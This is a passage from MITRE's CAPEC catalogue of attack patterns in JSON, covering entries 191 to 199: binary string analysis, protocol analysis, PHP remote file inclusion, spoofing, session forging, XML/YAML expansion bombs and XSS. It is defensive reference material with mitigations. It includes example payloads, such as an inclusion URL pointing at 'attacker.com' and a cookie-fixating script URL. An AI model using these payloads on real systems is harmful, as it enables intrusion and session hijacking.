commonly applied to a binary executable file and provide means for reverse engineering the file by revealing the hidden functions of its operation or composition."]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Other_Notes, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated @Name, Notes, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Reverse Engineer an Executable to Expose Assumed Hidden Functionality or Content",{"Date":"2019-04-04"}]}},"191":{"ID":"191","Name":"Read Sensitive Constants Within an Executable","Abstraction":"Detailed","Status":"Draft","Description":{"p":["An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable.","These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user\'s authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include \'strings,\' \'grep,\' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.","Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants."]},"Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"167","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Access to a binary or executable such that it can be analyzed by various utilities."},"Resources_Required":{"Resource":"Binary analysis programs such as \'strings\' or \'grep\', or hex editors."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"798"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1552.001","Entry_Name":"Unsecured Credentials:Credentials in files"}},"References":{"Reference":[{"External_Reference_ID":"REF-51","Section":"Decompiler"},{"External_Reference_ID":"REF-52","Section":"Debugger"},{"External_Reference_ID":"REF-53","Section":"Disassembler"}]},"Notes":{"Note":{"Type":"Other","p":["More sophisticated methods of searching for sensitive strings within a file involve disassembly or decompiling of the file. One could, for example, utilize disassembly methods on an ISAPI executable or dll to discover a hard-coded password within the code as it executes. This type of analysis usually involves four stages in which first a debugger is attached to the running process, anti-debugging countermeasures are circumvented or bypassed, the program is analyzed step-by-step, and breakpoints are established so that discrete functions and data structures can be analyzed.","Debugging tools such as SoftICE, Ollydbg, or vendor supplied debugging tools are often used. Disassembly tools such as IDA pro, or similar tools, can also be employed. A third strategy for accessing sensitive strings within a binary involves the decompilation of the file itself into source code that reveals the strings. An example of this type of analysis involves extracting source code from a java JAR file and then using functionality within a java IDE to search the source code for sensitive, hard-coded information. In performing this analysis native java tools, such as \\"jar\\" are used to extract the compiled class files. Next, a java decompiler such as \\"DJ\\" is used to extract java source code from the compiled classes, revealing source code. Finally, the source code is audited to reveal sensitive information, a step that is usually assisted by source code analysis programs."]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Other_Notes, References, Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Related_Attack_Patterns, Taxonomy_Mappings"}],"Previous_Entry_Name":["Read Sensitive Strings Within an Executable",{"Date":"2020-07-30"}]}},"192":{"ID":"192","Name":"Protocol Analysis","Abstraction":"Meta","Status":"Stable","Description":"An adversary engages in activities to decipher and/or decode protocol information for a network or application communication protocol used for transmitting information between interconnected nodes or systems on a packet-switched data network. While this type of analysis involves the analysis of a networking protocol inherently, it does not require the presence of an actual or physical network. Although certain techniques for protocol analysis benefit from manipulating live \'on-the-wire\' interactions between communicating components, static or dynamic analysis techniques applied to executables as well as to device drivers, such as network interface drivers, can also be used to reveal the function and characteristics of a communication protocol implementation. Depending upon the methods used the process may involve observing, interacting, and modifying actual communications occurring between hosts. The goal of protocol analysis is to derive the data transmission syntax, as well as to extract the meaningful content, including packet or content delimiters used by the protocol. This type of analysis is often performed on closed-specification protocols, or proprietary protocols, but is also useful for analyzing publicly available specifications to determine how particular implementations deviate from published specifications.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Prerequisites":{"Prerequisite":["Access to a binary executable.","The ability to observe and interact with a communication channel between communicating processes."]},"Skills_Required":{"Skill":["Knowlegde of the Open Systems Interconnection model (OSI model), and famililarity with Wireshark or some other packet analyzer.",{"Level":"High"}]},"Resources_Required":{"Resource":"Depending on the type of analysis, a variety of tools might be required, such as static code and/or dynamic analysis tools. Alternatively, the effort might require debugging programs such as ollydbg, SoftICE, or disassemblers like IDA Pro. In some instances, packet sniffing or packet analyzing programs such as TCP dump or Wireshark are necessary. Lastly, specific protocol analysis might require tools such as PDB (Protocol Debug), or packet injection tools like pcap or Nemesis."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"Successful deciphering of protocol information compromises the confidentiality of future sensitive communications."},{"Scope":"Integrity","Impact":"Modify Data","Note":"Modifying communications after successful deciphering of protocol information compromises integrity."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"326"}},"References":{"Reference":[{"External_Reference_ID":"REF-57","Section":"Proprietary protocol"},{"External_Reference_ID":"REF-50","Section":"Reverse engineering"}]},"Notes":{"Note":{"Type":"Other","p":["There are several challenges inherent to protocol analysis depending upon the nature of the protocol being analyzed. There may also be other types of factors which complicate the process such as encryption or ad hoc obfuscation of the protocol. In general there are two kinds of networking protocols, each associated with its own challenges and analysis approaches or methodologies. Some protocols are human-readable, which is to say they are text-based protocols. Examples of these types of protocols include HTTP, SMTP, and SOAP. Additionally, application-layer protocols can be embedded or encapsulated within human-readable protocols in the data portion of the packet. Typically, human-readable protocol implementations are susceptible to automatic decoding by the appropriate tools, such as Wireshark/ethereal, tcpdump, or similar protocol sniffers or analyzers.","The presence of well-known protocol specifications in addition to easily identified protocol delimiters, such as Carriage Return or Line Feed characters (CRLF) result in text-based protocols susceptibility to direct scrutiny through manual processes. Protocol analysis against protocol implementations such as HTTP is often performed to identify idiosyncratic implementations of a protocol by a server or client. In the case of application-layer protocols which are embedded within text-based protocols, analysis techniques typically benefit from the well-known nature of the encapsulating protocols and can focus on discovering the semantic characteristics of the proprietary protocol or API, since the syntax and protocol delimiters of the underlying protocols can be readily identified.","When performing protocol analysis of machine-readable (non-text-based) protocols difficulties emerge as the protocol itself was designed to be read by computing process. Such protocols are typically composed entirely in binary with no apparent syntax, grammar, or structural boundaries. Examples of these types of protocols are IP, UDP, and TCP. Binary protocols with published specifications can be automatically decoded by protocol analyzers, but in the case of proprietary, closed-specification, binary protocols there are no immediate indicators of packet syntax such as packet boundaries, delimiters, or structure, or the presence or absence of encryption or obfuscation. In these cases there is no one technology that can extract or reveal the structure of the packet on the wire, so it is necessary to use trial and error approaches while observing application behavior based on systematic mutations introduced at the packet-level. Tools such as Protocol Debug (PDB) or other packet injection suites are often employed. In cases where the binary executable is available, protocol analysis can be augmented with static and dynamic analysis techniques."]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Other_Notes, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Related_Weaknesses"}],"Previous_Entry_Name":["Protocol Reverse Engineering",{"Date":"2015-11-09"}]}},"193":{"ID":"193","Name":"PHP Remote File Inclusion","Abstraction":"Detailed","Status":"Draft","Description":"In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized \\"include\\" or \\"require\\" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"253"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt variations on input parameters] The attack variants make use of a remotely available PHP script that generates a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, an adversary requests variations on the inputs they surveyed before. They send parameters that include variations of payloads which include a reference to the remote PHP script. They record all the responses from the server that include the output of the execution of remote PHP script.","Technique":["Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads which include a reference to the adversary controlled remote PHP script.","Use a proxy tool to record results of manual input of remote file inclusion probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Run arbitrary server-side code] As the adversary succeeds in exploiting the vulnerability, they are able to execute server-side code within the application. The malicious code has virtual access to the same resources as the targeted application. Note that the adversary might include shell code in their script and execute commands on the server under the same privileges as the PHP runtime is running with.","Technique":"Develop malicious PHP script that is injected through vectors identified during the Experiment Phase and executed by the application server to execute a custom PHP script."}]},"Prerequisites":{"Prerequisite":["Target application server must allow remote files to be included in the \\"require\\", \\"include\\", etc. PHP directives","The adversary must have the ability to make HTTP requests to the target web application."]},"Skills_Required":{"Skill":["To inject the malicious payload in a web page",{"Level":"Low"},"To bypass filters in the application",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Only allow known files to be included (allowlist)","Implementation: Make use of indirect references passed in URL parameters instead of file names","Configuration: Ensure that remote scripts cannot be include in the \\"include\\" or \\"require\\" PHP directives"]},"Example_Instances":{"Example":{"div":{"style":"margin-left:10px;","ul":{"li":["The adversary controls a PHP script on a server \\"http://attacker.com/rfi.txt\\"","The .txt extension is given so that the script doesn\'t get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET[\'filename\'] . \'.txt\')","The adversary creates an HTTP request that passes their own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the \\".txt\\" prefix, the PHP runtime download the attack\'s script and the content of the script gets executed in the same context as the rest of the original script."]}}}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"98"},{"CWE_ID":"80"}]},"References":{"Reference":[{"External_Reference_ID":"REF-59","Section":"WASC-05 - Remote File Inclusion"},{"External_Reference_ID":"REF-60"},{"External_Reference_ID":"REF-30","Section":"OWASP Top 10 2007 A3 \u2013 Malicious File Execution"},{"External_Reference_ID":"REF-621","Section":"PHP File Inclusion"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"194":{"ID":"194","Name":"Fake the Source of Data","Abstraction":"Standard","Status":"Stable","Description":"An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified \\"From\\" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":{"Exclude_ID":"512"}},{"Nature":"CanPrecede","CAPEC_ID":"657"},{"Nature":"CanPrecede","CAPEC_ID":"667"}]},"Prerequisites":{"Prerequisite":"This attack is only applicable when a vulnerable entity associates data or services with an identity. Without such an association, there would be no reason to fake the source."},"Resources_Required":{"Resource":"Resources required vary depending on the nature of the attack. Possible tools needed by an attacker could include tools to create custom network packets, specific client software, and tools to capture network traffic. Many variants of this attack require no attacker resources, however."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Alter Execution Logic","Note":"By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed."},{"Scope":"Integrity","Impact":"Gain Privileges","Note":"By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had."},{"Scope":"Integrity","Impact":"Hide Activities","Note":"Faking the source of data or services can be used to create a false trail in logs as the target will associate any actions with the impersonated identity instead of the adversary."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"287"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"38","Entry_Name":"URL Redirector Abuse"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"195":{"ID":"195","Name":"Principal Spoof","Abstraction":"Standard","Status":"Draft","Description":"A Principal Spoof is a form of Identity Spoofing where an adversary pretends to be some other person in an interaction. This is often accomplished by crafting a message (either written, verbal, or visual) that appears to come from a person other than the adversary. Phishing and Pharming attacks often attempt to do this so that their attempts to gather sensitive information appear to come from a legitimate source. A Principal Spoof does not use stolen or spoofed authentication credentials, instead relying on the appearance and content of the message to reflect identity. The possible outcomes of a Principal Spoof mirror those of Identity Spoofing. (e.g., escalation of privilege and false attribution of data or activities) Likewise, most techniques for Identity Spoofing (crafting messages or intercepting and replaying or modifying messages) can be used for a Principal Spoof attack. However, because a Principal Spoof is used to impersonate a person, social engineering can be both an attack technique (using social techniques to generate evidence in support of a false identity) as well as a possible outcome (manipulating people\'s perceptions by making statements or performing actions under a target\'s name).","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"The target must associate data or activities with a person\'s identity and the adversary must be able to modify this identity without detection."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"196":{"ID":"196","Name":"Session Credential Falsification through Forging","Abstraction":"Standard","Status":"Draft","Description":"An attacker creates a false but functional session credential in order to gain or usurp access to a service. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. If an attacker is able to forge valid session credentials they may be able to bypass authentication or piggy-back off some other authenticated user\'s session. This attack differs from Reuse of Session IDs and Session Sidejacking attacks in that in the latter attacks an attacker uses a previous or existing credential without modification while, in a forging attack, the attacker must create their own credential, although it may be based on previously observed credentials.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"CanPrecede","CAPEC_ID":"384"},{"Nature":"CanPrecede","CAPEC_ID":"61"},{"Nature":"ChildOf","CAPEC_ID":"21"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Analyze and Understand Session IDs] The attacker finds that the targeted application use session credentials to identify legitimate users.","Technique":["An attacker makes many anonymous connections and records the session IDs.","An attacker makes authorized connections and records the session tokens or credentials."]},{"Step":"2","Phase":"Experiment","Description":"[Create Session IDs.] Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies.","Technique":"The attacker manipulates the HTTP request message and adds their forged session IDs in to the requests or cookies."},{"Step":"3","Phase":"Exploit","Description":"[Abuse the Victim\'s Session Credentials] The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier.","Technique":["The attacker loads the predefined or predicted session ID into their browser and browses to protected data or functionality.","The attacker loads the predefined or predicted session ID into their software and utilizes functionality with the rights of the victim."]}]},"Prerequisites":{"Prerequisite":"The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers."},"Skills_Required":{"Skill":["Forge the session credential and reply the request.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.","Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes."]},"Example_Instances":{"Example":{"p":["This example uses client side scripting to set session ID in the victim\'s browser. The JavaScript code","fixates a falsified session credential into victim\'s browser, with the help of crafted a URL link.","A similar example uses session ID as an argument of the URL.","Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim\'s session."],"div":["document.cookie=\\"sessionid=0123456789\\"",{"style":"margin-left:10px;","class":"informative"},"http://www.example.com/<script>document.cookie=\\"sessionid=0123456789\\";<\/script>",{"style":"margin-left:10px;","class":"informative"},"http://www.example.com/index.php/sessionid=0123456789",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"384"},{"CWE_ID":"664"}]},"References":{"Reference":[{"External_Reference_ID":"REF-62"},{"External_Reference_ID":"REF-63","Section":"Testing for Session Management"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"}]}},"197":{"ID":"197","Name":"Exponential Data Expansion","Abstraction":"Detailed","Status":"Draft","Description":"An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor\'s CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.","Alternate_Terms":{"Alternate_Term":[{"Term":"Billion Laughs Attack"},{"Term":"XML Bomb"},{"Term":"XML Entity Expansion (XEE)"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"230"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] An adversary determines the input data stream that is being processed by a data parser that supports using subsitituion on the victim\'s side.","Technique":["Use an automated tool to record all instances of URLs to process requests.","Use a browser to manually explore the website and analyze how the application processes requests."]},{"Step":"2","Phase":"Exploit","Description":"[Craft malicious payload] The adversary crafts malicious message containing nested exponential expansion that completely uses up available server resource."},{"Step":"3","Phase":"Exploit","Description":"[Send the message] Send the malicious crafted message to the target URL."}]},"Prerequisites":{"Prerequisite":"This type of attack requires that the target must receive input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption."},"Skills_Required":{"Skill":["Ability to craft nested data expansion messages.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"Denial of Service"}},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.","Implementation: For XML based data - disable altogether the use of inline DTD schemas when parsing XML objects. If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources."]},"Example_Instances":{"Example":[{"p":["The most common example of this type of attack is the \\"many laughs\\" attack (sometimes called the \'billion laughs\' attack). For example:","This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow."],"div":["<?xml version=\\"1.0\\"?>",{"style":"margin-left:10px;","class":"informative","div":["<!ENTITY lol \\"lol\\">",{"style":"margin-left:10px;"}]}]},{"p":"This example is similar, but uses YAML. This was used to attack Kubernetes [REF-686]","div":["a: &a [\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\"]",{"style":"margin-left:10px;","class":"informative"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"776"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"44","Entry_Name":"XML Entity Expansion"}},"References":{"Reference":[{"External_Reference_ID":"REF-64"},{"External_Reference_ID":"REF-65"},{"External_Reference_ID":"REF-66"},{"External_Reference_ID":"REF-67"},{"External_Reference_ID":"REF-67"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Name, Alternate_Terms, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites, Related_Weaknesses, Skills_Required"}],"Previous_Entry_Name":["XML Entity Expansion",{"Date":"2021-10-21"}]}},"198":{"ID":"198","Name":"XSS Targeting Error Pages","Abstraction":"Detailed","Status":"Draft","Description":"An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message is returned including the exploit code which then runs in the victim\'s browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Prerequisites":{"Prerequisite":["A third party web server which fails to adequately sanitize messages sent in error pages.","The victim must be made to execute a query crafted by the attacker which results in the infected error report."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input.","Implementation: Normalize, filter and use an allowlist for any input that will be used in error messages.","Implementation: The victim should configure the browser to minimize active content from untrusted sources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"81"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Cross-Site Scripting in Error Pages",{"Date":"2017-05-01"}]}},"199":{"ID":"199","Name":"XSS Using Alternate Syntax","Abstraction":"Detailed","Status":"Draft","Description":"An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are 